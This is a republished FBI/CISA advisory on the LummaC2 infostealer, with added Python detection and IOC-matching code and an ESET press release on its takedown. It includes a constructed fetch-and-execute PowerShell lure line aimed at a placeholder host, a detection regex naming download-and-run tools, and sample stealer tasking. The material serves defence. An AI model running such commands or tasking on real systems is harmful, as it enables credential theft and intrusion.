Category: Justice

  • MIL-OSI Security: Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

    Source: US Department of Homeland Security

    Summary

    The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.

    The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.

    Technical Details

    Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques.

    Overview

    LummaC2 malware first appeared for sale on multiple Russian-language cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload themselves by interacting with a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA). The fake CAPTCHA instructs the user to open the Windows Run dialog (Windows key + R) and paste the clipboard contents (CTRL + V), which the lure page has already populated with a command. When the user presses Enter, a Base64-encoded PowerShell command is executed.
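    The Run-dialog lure above leaves a distinctive trace in process-creation telemetry: a PowerShell process with an -EncodedCommand argument whose parent is explorer.exe. As an added illustration (not code from the advisory), the Python routine below decodes that argument (Base64 of the UTF-16LE script text, so it must be decoded as UTF-16LE rather than UTF-8) and flags the launch when the parent is the shell and/or the decoded script fetches and evaluates remote content. Field names mirror Sysmon Event ID 1, but every event, the lure script and the example.invalid URL are constructed for the example.

```python
"""Triage process-creation events for the Win+R / paste lure described above.

Added example, not code from the advisory. Field names follow Sysmon Event ID 1
(ParentImage, Image, CommandLine) but every event, the lure script and the
example.invalid URL are constructed.
"""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENC_PREFIXES = {"e", "ec"} | {"encodedcommand"[:i] for i in range(2, 15)}

# What a stage-one loader pasted from a fake CAPTCHA page usually has to do:
# fetch something remote and evaluate it.
DOWNLOAD_EVAL = re.compile(
    r"(\biex\b|invoke-expression|downloadstring|downloadfile|\biwr\b|invoke-webrequest|"
    r"invoke-restmethod|frombase64string|\bcurl\b|\bwget\b)",
    re.I,
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if the line has none.

    The argument is Base64 of the UTF-16LE script text, so decoding the bytes
    as UTF-8 would leave a NUL after every character; decode as UTF-16LE.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] in "-/" and tok[1:].lower() in ENC_PREFIXES:
            try:
                raw = base64.b64decode(tokens[i + 1].strip("\"'"), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(event: dict) -> Optional[dict]:
    """Flag an encoded PowerShell launch that matches the lure pattern.

    Two independent signals: the parent is explorer.exe (a Win+R launch is a
    child of the shell, not of a script host or a management agent), and/or the
    decoded script downloads and evaluates remote content.
    """
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return None
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    if decoded is None:
        return None
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if parent == "explorer.exe":
        reasons.append("encoded PowerShell spawned directly by explorer.exe")
    if DOWNLOAD_EVAL.search(decoded):
        reasons.append("decoded script downloads and evaluates remote content")
    return {"decoded": decoded, "reasons": reasons} if reasons else None


def find_clickfix(events) -> list:
    return [hit for hit in (triage(e) for e in events) if hit]


# Constructed samples. LURE_SCRIPT stands in for whatever the fake CAPTCHA page
# copied to the clipboard; the second event is a benign encoded command for contrast.
LURE_SCRIPT = "iwr -UseBasicParsing https://example.invalid/verify | iex"
LURE_B64 = base64.b64encode(LURE_SCRIPT.encode("utf-16-le")).decode()
BENIGN_B64 = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -w hidden -enc {LURE_B64}"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoProfile -EncodedCommand {BENIGN_B64}"},
]

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(hit["decoded"], "|", "; ".join(hit["reasons"]))
```

    On the host itself, whatever the user pasted into the Run dialog is also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside the process event when confirming an infection.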

    To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake versions of popular software (e.g., multimedia players or utility software) [T1036]. The malware’s obfuscation allows LummaC2 actors to bypass standard defenses, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, that are designed to flag common phishing attempts or drive-by downloads [T1027].

    Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.

    File Execution

    Upon execution, the LummaC2.exe file will enter its main routine, which includes four sub-routines (see Figure 1).

    Figure 1. LummaC2 Main Routine

    The first routine decrypts strings for a message box that is displayed to the user (see Figure 2).

    Figure 2. Message Box

    If the user selects No, the malware will exit. If the user selects Yes, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section.

    After each domain is decoded, the implant will attempt a POST request [T1071.001] (see Figure 3).

    Figure 3. Post Request

    If the POST request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine, which retrieves JSON-formatted commands (see Figure 4).

    Figure 4. Code Saving Successful Callback Request

    Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) GetUserNameW and GetComputerNameW respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5).

    Figure 5. User and Computer Name Check

    The hashing routine was not identified as a standard algorithm; it is a simple custom routine that reduces a Unicode string to a 32-bit value.

    If the username hash equals 0x56CF7626, the computer name is queried. If the computer name is seven characters long, it is hashed and checked against the hard-coded value 0xB09406C7. If both values match, a final subroutine is called with the computer name hash as a static argument, and the process terminates. This is most likely a failsafe to prevent the malware from running on the developer’s own system; because the hash is one-way, it does not reveal the developer’s hostname or username.

    If the username and hostname check returns zero (no match against the hard-coded values), the malware enters its main callback routine. It contacts the C2 domain saved in the earlier callback routine and sends the following POST request (see Figure 6).

    Figure 6. Second POST Request

    The data returned from the C2 server is encrypted. Once decrypted, the C2 data is in JSON format and is parsed by the LummaC2 malware. The malware reads its browser-extension target list from the ex key, which contains an array of objects (see Figure 7).

    Figure 7. Parsing of ex JSON Value

    The c key also contains an array of objects; these give the implant its C2 tasking (see Figure 8).

    Figure 8. Parsing of c JSON Value

    C2 Instructions

    Each array object that contains the JSON key t is evaluated as a command opcode, resulting in the C2 instructions described in the subsections below.

    1. Opcode 0 – Steal Data Generic

    This command allows five fields to be defined when stealing data, offering the most flexibility. Opcode 0 lets LummaC2 affiliates specify their own collection targets (see Table 1).

    Table 1. Opcode 0 Options
    Key Value
    p Path to steal from
    m File extensions to read
    z Output directory to store stolen data
    d Depth of recursiveness
    fs Maximum file size

    2. Opcode 1 – Steal Browser Data

    This command only allows for two options: a path and the name of the output directory. Based on sample configuration downloads, it is used to steal browser data from every browser except Mozilla-based ones [T1217] (see Table 2).

    Table 2. Opcode 1 Options
    Key Value
    p Path to steal from
    z Name of Browser – Output

    3. Opcode 2 – Steal Browser Data (Mozilla)

    This command is identical in form to Opcode 1; however, it appears to be used solely for Mozilla browser data (see Table 3).

    Table 3. Opcode 2 Options
    Key Value
    p Path to steal from
    z Name of Browser – Output

    4. Opcode 3 – Download a File

    This command contains three options: a URL, a file extension, and an execution type. The configuration specifies a remote file to download with the u key; the file is written with the extension given in the ft key [T1105] (see Table 4).

    Table 4. Opcode 3 Options
    Key Value
    u URL for Download
    ft File Extension
    e Execution Type

    The e key can take two values, 0 or 1, which select how the downloaded file is executed: loaded into the implant’s own process with the LoadLibraryW API, or launched from the command line with rundll32.exe [T1106] (see Table 5). Both methods load the payload as a DLL.

    Table 5. Execution Types
    Key Value
    e=0 Execute with LoadLibraryW()
    e=1 Execute with rundll32.exe

    5. Take Screenshot

    If the configuration JSON file has a key of “se” and its value is “true,” the malware will take a screenshot in BMP format and upload it to the C2 server.

    6. Delete Self

    If the configuration JSON file has a key of “ad” and its value is “true,” the malware will enter a routine to delete itself.

    The command shown in Figure 9 will be decoded and executed for self-deletion.

    Figure 9. Self-Deletion Command Line

    Figure 10 depicts the above command line during execution.

    Figure 10. Decoded Command Line in Memory
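    To make the opcode tables above concrete, here is an added Python parser (not LummaC2’s own code and not from the advisory) that turns a decrypted configuration of the shape described in this section into analyst-readable tasking. The key names (c, ex, t, p, m, z, d, fs, u, ft, e, se, ad) follow the tables; the sample configuration, its paths and the example.invalid URL are constructed, and the objects in the ex array are left empty because the advisory does not document their fields. Unknown opcodes raise rather than being skipped, so a new command type in a fresh sample is noticed.

```python
"""Interpret a decrypted LummaC2-style task configuration.

Added example, not LummaC2's code and not from the advisory. Key names follow
the opcode tables above; SAMPLE_CONFIG, its paths and the example.invalid URL
are constructed, and the ex objects are left empty because their fields are not
documented in the advisory.
"""
import json
from typing import Dict

# opcode -> (label, keys the advisory documents for it)
OPCODES = {
    0: ("steal-generic", ("p", "m", "z", "d", "fs")),
    1: ("steal-browser", ("p", "z")),
    2: ("steal-browser-mozilla", ("p", "z")),
    3: ("download-execute", ("u", "ft", "e")),
}
EXEC_TYPES = {0: "LoadLibraryW", 1: "rundll32.exe"}


def describe_task(obj: Dict) -> str:
    """Render one object of the c array. Unknown opcodes raise so that a new
    command type in a fresh sample is noticed instead of silently dropped."""
    t = obj["t"]
    if t not in OPCODES:
        raise ValueError(f"unknown opcode {t!r}")
    label, keys = OPCODES[t]
    if t == 0:
        desc = (f"{label}: path={obj.get('p')} ext={obj.get('m')} out={obj.get('z')} "
                f"depth={obj.get('d')} max_size={obj.get('fs')}")
    elif t in (1, 2):
        desc = f"{label}: path={obj.get('p')} out={obj.get('z')}"
    else:
        mode = EXEC_TYPES.get(obj.get("e"), f"unknown({obj.get('e')!r})")
        desc = f"{label}: url={obj.get('u')} ext={obj.get('ft')} exec={mode}"
    missing = [k for k in keys if k not in obj]
    return desc + (f" [missing keys: {','.join(missing)}]" if missing else "")


def parse_config(text: str) -> Dict:
    """Summarise the whole configuration: tasking, extension targets, flags, URLs."""
    cfg = json.loads(text)
    tasks = cfg.get("c", [])
    return {
        "tasks": [describe_task(o) for o in tasks if "t" in o],
        "extension_targets": len(cfg.get("ex", [])),
        # the advisory quotes the flag value as "true"; accept the JSON boolean too
        "screenshot": cfg.get("se") in (True, "true"),
        "self_delete": cfg.get("ad") in (True, "true"),
        "download_urls": [o["u"] for o in tasks if o.get("t") == 3 and "u" in o],
    }


# Constructed sample in the documented shape; paths and URL are placeholders.
SAMPLE_CONFIG = json.dumps({
    "ex": [{}, {}],
    "c": [
        {"t": 0, "p": "%USERPROFILE%\\Desktop", "m": "*.txt,*.docx", "z": "Docs", "d": 2, "fs": 1048576},
        {"t": 1, "p": "%LOCALAPPDATA%\\Google\\Chrome\\User Data", "z": "Chrome"},
        {"t": 2, "p": "%APPDATA%\\Mozilla\\Firefox\\Profiles", "z": "Firefox"},
        {"t": 3, "u": "https://example.invalid/stage2.bin", "ft": "dll", "e": 1},
    ],
    "se": True,
    "ad": False,
})

if __name__ == "__main__":
    summary = parse_config(SAMPLE_CONFIG)
    for line in summary["tasks"]:
        print(line)
    print({k: v for k, v in summary.items() if k != "tasks"})
```

    The download_urls field is the part worth feeding straight into blocking and hunting, since an Opcode 3 task is where the infostealer turns into a loader for a second-stage DLL.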

    Host Modifications

    Without any C2 interaction, the LummaC2 malware does not create any files on the infected drive. It runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. Commands returned from the C2 server can instruct it to drop additional files and/or save data to files on the local disk; this behavior is variable because the commands come from the C2 server and can change.

    Decrypted Strings

    Below is a list of hard-coded decrypted strings located in the binary (see Figure 11).

    Figure 11. Decoded Strings

    Indicators of Compromise

    See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties.

    Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.

    Table 6. LummaC2 Executable Hashes
    Executables Type
    4AFDC05708B8B39C82E60ABE3ACE55DB (LummaC2.exe from November 2023) MD5
    E05DF8EE759E2C955ACC8D8A47A08F42 (LummaC2.exe from November 2023) MD5
    C7610AE28655D6C1BCE88B5D09624FEF MD5
    1239288A5876C09D9F0A67BCFD645735168A7C80 (LummaC2.exe from November 2023) SHA1
    B66DA4280C6D72ADCC68330F6BD793DF56A853CB (LummaC2.exe from November 2023) SHA1
    3B267FA5E1D1B18411C22E97B367258986E871E5 TLSH
    19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023) SHA256
    2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (LummaC2.exe from November 2023) SHA256
    4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D SHA256
    325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a SHA256
    76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c SHA256
    7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70 SHA256
    a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab SHA256
    b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959 SHA256
    ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b SHA256
    Table 7. LummaC2 DLL Binaries
    DLL Binaries Type
    iphlpapi.dll IP Helper API
    winhttp.dll Windows HTTP Services

    Note: the two DLLs in Table 7 are legitimate Windows system libraries that the malware loads for its network and HTTP functionality; their presence on a host is expected and is not by itself an indicator of compromise. The hashes in Table 6 are the file-level indicators.

    The following domains were observed deploying LummaC2 malware or serving as its C2 infrastructure.

    Disclaimer: The domains below are historical in nature and may not currently be malicious.

    • Pinkipinevazzey[.]pw
    • Fragnantbui[.]shop
    • Medicinebuckerrysa[.]pw
    • Musicallyageop[.]pw
    • stogeneratmns[.]shop
    • wallkedsleeoi[.]shop
    • Tirechinecarpet[.]pw
    • reinforcenh[.]shop
    • reliabledmwqj[.]shop
    • Musclefarelongea[.]pw
    • Forbidstow[.]site
    • gutterydhowi[.]shop
    • Fanlumpactiras[.]pw
    • Computeryrati[.]site
    • Contemteny[.]site
    • Ownerbuffersuperw[.]pw
    • Seallysl[.]site
    • Dilemmadu[.]site
    • Freckletropsao[.]pw
    • Opposezmny[.]site
    • Faulteyotk[.]site
    • Hemispheredodnkkl[.]pw
    • Goalyfeastz[.]site
    • Authorizev[.]site
    • ghostreedmnu[.]shop
    • Servicedny[.]site
    • blast-hubs[.]com
    • offensivedzvju[.]shop
    • friendseforever[.]help
    • blastikcn[.]com
    • vozmeatillu[.]shop
    • shiningrstars[.]help
    • penetratebatt[.]pw
    • drawzhotdog[.]shop
    • mercharena[.]biz
    • pasteflawwed[.]world
    • generalmills[.]pro
    • citywand[.]live
    • hoyoverse[.]blog
    • nestlecompany[.]pro
    • esccapewz[.]run
    • dsfljsdfjewf[.]info
    • naturewsounds[.]help
    • travewlio[.]shop
    • decreaserid[.]world
    • stormlegue[.]com
    • touvrlane[.]bet
    • governoagoal[.]pw
    • paleboreei[.]biz
    • calmingtefxtures[.]run
    • foresctwhispers[.]top
    • tracnquilforest[.]life
    • sighbtseeing[.]shop
    • advennture[.]top
    • collapimga[.]fun
    • holidamyup[.]today
    • pepperiop[.]digital
    • seizedsentec[.]online
    • triplooqp[.]world
    • easyfwdr[.]digital
    • strawpeasaen[.]fun
    • xayfarer[.]live
    • jrxsafer[.]top
    • quietswtreams[.]life
    • oreheatq[.]live
    • plantainklj[.]run
    • starrynsightsky[.]icu
    • castmaxw[.]run
    • puerrogfh[.]live
    • earthsymphzony[.]today
    • weldorae[.]digital
    • quavabvc[.]top
    • citydisco[.]bet
    • steelixr[.]live
    • furthert[.]run
    • featureccus[.]shop
    • smeltingt[.]run
    • targett[.]top
    • mrodularmall[.]top
    • ferromny[.]digital
    • ywmedici[.]top
    • jowinjoinery[.]icu
    • rodformi[.]run
    • legenassedk[.]top
    • htardwarehu[.]icu
    • metalsyo[.]digital
    • ironloxp[.]live
    • cjlaspcorne[.]icu
    • navstarx[.]shop
    • bugildbett[.]top
    • latchclan[.]shop
    • spacedbv[.]world
    • starcloc[.]bet
    • rambutanvcx[.]run
    • galxnetb[.]today
    • pomelohgj[.]top
    • scenarisacri[.]top
    • jawdedmirror[.]run
    • changeaie[.]top
    • lonfgshadow[.]live
    • liftally[.]top
    • nighetwhisper[.]top
    • salaccgfa[.]top
    • zestmodp[.]top
    • owlflright[.]digital
    • clarmodq[.]top
    • piratetwrath[.]run
    • hemispherexz[.]top
    • quilltayle[.]live
    • equatorf[.]run
    • latitudert[.]live
    • longitudde[.]digital
    • climatologfy[.]top
    • starofliught[.]top
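    Before blocking, the disclaimers above ask for the indicators to be vetted; the same code path can do the matching. The Python below is an added example (not from the advisory) that checks files against the hashes in Table 6 and DNS query logs against the domain list. IOC_HASHES and IOC_DOMAINS_DEFANGED hold only a subset copied from the tables above and should be extended from the advisory’s IOC file; the log lines and the in-memory sample blob are constructed. The TLSH entry in Table 6 is left out on purpose: TLSH is a similarity digest compared by distance, not by equality, so it does not belong in an exact-match lookup.

```python
"""Match file digests and DNS query logs against the published LummaC2 IOCs.

Added example, not from the advisory. IOC_HASHES and IOC_DOMAINS_DEFANGED hold
a subset of Table 6 and the domain list; the DNS log lines and the sample blob
are constructed. The TLSH entry is omitted (similarity digest, not exact match).
"""
import hashlib
import re
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

IOC_DOMAINS_DEFANGED = [  # defanged as published; refang() before matching
    "Pinkipinevazzey[.]pw", "reinforcenh[.]shop", "blast-hubs[.]com",
    "generalmills[.]pro", "nestlecompany[.]pro", "starofliught[.]top",
]
IOC_HASHES = [  # hex length identifies the algorithm: 32 MD5, 40 SHA-1, 64 SHA-256
    "4AFDC05708B8B39C82E60ABE3ACE55DB",
    "1239288A5876C09D9F0A67BCFD645735168A7C80",
    "19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB",
    "325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a",
]
HASH_ALGOS = {32: "md5", 40: "sha1", 64: "sha256"}
DNS_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query:\s+(?P<qname>\S+)")


def refang(domain: str) -> str:
    """'Example[.]com' -> 'example.com'; DNS names are case-insensitive."""
    return domain.replace("[.]", ".").strip().lower()


def index_hashes(hashes: Iterable[str]) -> Dict[str, set]:
    """Group IOC hashes by algorithm; reject anything that is not hex of a known length."""
    idx: Dict[str, set] = {}
    for h in hashes:
        h = h.strip().lower()
        algo = HASH_ALGOS.get(len(h))
        if algo is None or not re.fullmatch(r"[0-9a-f]+", h):
            raise ValueError(f"not a recognised hash: {h!r}")
        idx.setdefault(algo, set()).add(h)
    return idx


def digest_stream(chunks: Iterable[bytes], algos: Iterable[str]) -> Dict[str, str]:
    """Read the data once and feed every requested digest from the same chunks."""
    hashers = {a: hashlib.new(a) for a in algos}
    for chunk in chunks:
        for h in hashers.values():
            h.update(chunk)
    return {a: h.hexdigest() for a, h in hashers.items()}


def scan_streams(items: Iterable[Tuple[str, Iterable[bytes]]], hashes: Iterable[str]) -> List[Dict]:
    """items yields (name, chunk iterator); each stream is hashed once per IOC algorithm."""
    idx = index_hashes(hashes)
    hits: List[Dict] = []
    for name, chunks in items:
        digests = digest_stream(chunks, idx)
        hits += [{"path": name, "algo": a, "hash": d} for a, d in digests.items() if d in idx[a]]
    return hits


def scan_files(paths: Iterable[Path], hashes: Iterable[str]) -> List[Dict]:
    def chunks(p: Path):
        with p.open("rb") as f:
            yield from iter(lambda: f.read(1 << 20), b"")
    return scan_streams(((str(p), chunks(p)) for p in paths), hashes)


def scan_dns(lines: Iterable[str], domains: Iterable[str]) -> List[Dict]:
    """Flag a query for an IOC domain or for any subdomain beneath it."""
    iocs = {refang(d) for d in domains}
    hits = []
    for line in lines:
        m = DNS_LINE.match(line)
        if not m:
            continue
        qname = m["qname"].rstrip(".").lower()
        labels = qname.split(".")
        for i in range(len(labels) - 1):   # try the qname, then each parent domain
            parent = ".".join(labels[i:])
            if parent in iocs:
                hits.append({"ts": m["ts"], "client": m["client"], "qname": qname, "ioc": parent})
                break
    return hits


# Constructed resolver log reduced to ts / client / qname fields.
SAMPLE_DNS_LOG = [
    "2025-05-20T10:01:02Z 10.0.0.15 query: www.example.com. IN A",
    "2025-05-20T10:01:09Z 10.0.0.15 query: reinforcenh.shop. IN A",
    "2025-05-20T10:02:11Z 10.0.0.22 query: cdn.blast-hubs.com. IN A",
    "2025-05-20T10:02:30Z 10.0.0.22 query: notblast-hubs.com. IN A",
]
```

    Matching on parent domains (but not on mere suffix overlap, as the notblast-hubs.com line shows) is what keeps the domain check useful once affiliates start using subdomains of a listed C2 domain; for the hashes, a single pass over each file feeds all three digest algorithms so large directories are read once.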

    MITRE ATT&CK Tactics and Techniques

    See Table 8 through Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

    Table 8. Initial Access
    Technique Title ID Use
    Phishing T1566 Threat actors delivered LummaC2 malware through phishing emails.
    Phishing: Spearphishing Attachment T1566.001 Threat actors used spearphishing attachments to deploy LummaC2 malware payloads.
    Phishing: Spearphishing Link T1566.002 Threat actors used spearphishing hyperlinks to deploy LummaC2 malware payloads.
    Table 9. Defense Evasion
    Technique Title ID Use
    Obfuscated Files or Information T1027 Threat actors obfuscated the malware to bypass standard cybersecurity measures designed to flag common phishing attempts or drive-by downloads.
    Masquerading T1036 Threat actors delivered LummaC2 malware via spoofed software.
    Deobfuscate/Decode Files or Information T1140 Threat actors used LummaC2 malware to decrypt its callback C2 domains.
    Table 10. Discovery
    Technique Title ID Use
    Query Registry T1012 Threat actors used LummaC2 malware to query the user’s name and computer name utilizing the APIs GetUserNameW and GetComputerNameW. (Note: the malware calls these Win32 APIs rather than reading the registry itself, so System Owner/User Discovery [T1033] and System Information Discovery [T1082] are closer mappings for detection engineering.)
    Browser Information Discovery T1217 Threat actors used LummaC2 malware to steal browser data.
    Table 11. Collection
    Technique Title ID Use
    Automated Collection T1119 LummaC2 malware has automated collection of various information including cryptocurrency wallet details.
    Table 12. Command and Control
    Technique Title ID Use
    Application Layer Protocol: Web Protocols T1071.001 Threat actors used LummaC2 malware to attempt POST requests.
    Ingress Tool Transfer T1105 Threat actors used LummaC2 malware to transfer a remote file to compromised systems.
    Table 13. Exfiltration
    Technique Title ID Use
    Exfiltration TA0010 Threat actors used LummaC2 malware to exfiltrate sensitive user information, including traditional credentials, cryptocurrency wallets, browser extensions, and MFA details without immediate detection.
    Native API T1106 LummaC2 malware executes a downloaded payload through the native LoadLibraryW API. (Note: T1106 belongs to the Execution tactic, not Exfiltration.)

    Mitigations

    The FBI and CISA recommend organizations implement the mitigations below to reduce the risk of compromise by LummaC2 malware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations.

    • Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry [CPG 2.E].
    • Monitor and detect suspicious behavior during exploitation [CPG 3.A].
      • Monitor and detect suspicious behavior, creation and termination events, and unusual and unexpected processes running.
      • Monitor API calls that may attempt to retrieve system information.
      • Analyze behavior patterns from process activities to identify anomalies.
      • For more information, visit CISA’s guidance on: Enhanced Visibility and Hardening Guidance for Communications Infrastructure.
    • Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Protect against threat actor phishing campaigns by implementing CISA’s Phishing Guidance and Phishing-resistant multifactor authentication. [CPG 2.H]
    • Log Collection: Regularly monitoring and reviewing registry changes and access logs can support detection of LummaC2 malware [CPG 2.T].
    • Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform and review logs of user actions to detect unauthorized use and abuse. Apply principles of least privilege to user accounts and groups, allowing only the performance of authorized actions.
    • Audit user accounts and revoke credentials for departing employees, removing those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts.
    • Keep systems up to date with regular updates, patches, hot fixes, and service packs that may minimize vulnerabilities. Learn more by visiting CISA’s webpage: Secure our World Update Software.
    • Secure network devices to restrict command line access.
    • Use segmentation to prevent access to sensitive systems and information, possibly with the use of Demilitarized Zone (DMZ) or virtual private cloud (VPC) instances to isolate systems [CPG 2.F].
    • Monitor and detect API usage, looking for unusual or malicious behavior.

    Validate Security Controls

    In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess performance against the ATT&CK techniques described in this advisory.

    To get started:

    1. Select an ATT&CK technique described in this advisory (see Table 8 through Table 13).
    2. Align your security technologies against the technique.
    3. Test your technologies against the technique.
    4. Analyze your detection and prevention technologies’ performance.
    5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
    6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

    The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

    Reporting

    Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

    The FBI is interested in any information that can be shared, to include the status and scope of infection, estimated loss, date of infection, date detected, initial attack vector, and host- and network-based indicators.

    To report information, please contact the FBI’s Internet Crime Complaint Center (IC3), your local FBI field office, or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

    Disclaimer

    The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the FBI and CISA.

    Acknowledgements

    ReliaQuest contributed to this advisory.

    Version History

    May 21, 2025: Initial version.

    MIL Security OSI

  • MIL-OSI: ESET takes part in global operation to disrupt Lumma Stealer, one of the most prevalent infostealers

    Source: GlobeNewswire (MIL-OSI)

    • ESET took part in a globally coordinated operation to disrupt Lumma Stealer.
    • The operation, led by Microsoft, targeted Lumma Stealer infrastructure, including all known C&C servers from the past year, making the botnet, in large part, inoperative.
    • Lumma Stealer has been one of the most prevalent infostealers over the past two years.
    • ESET provided both technical analysis and statistical information, and extracted essential data from tens of thousands of samples, as Lumma Stealer developers had been actively developing and maintaining the malware.

    PRAGUE and BRATISLAVA, Slovakia, May 21, 2025 (GLOBE NEWSWIRE) — ESET has collaborated with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry in a global disruption operation against Lumma Stealer, an infamous Malware-as-a-Service infostealer. The operation targeted Lumma Stealer infrastructure, specifically all known C&C servers of the past year, making the botnet, in large part, inoperative.

    “ESET automated systems processed tens of thousands of Lumma Stealer samples, dissecting them to extract key elements, such as C&C servers and affiliate identifiers. This allowed us to continuously monitor Lumma Stealer’s activity, cluster affiliates, keep track of development updates, and more,” says ESET researcher Jakub Tomanek, who monitors and investigates Lumma Stealer. “Infostealer malware families, like Lumma Stealer, are typically just a foreshadowing of future, much more devastating attacks. Harvested credentials are a valued commodity in the cybercrime underworld, sold by initial access brokers to various other cybercriminals, including ransomware affiliates,” adds Tomanek. Lumma Stealer has been one of the most prevalent infostealers over the past two years, leaving no part of the world untouched.

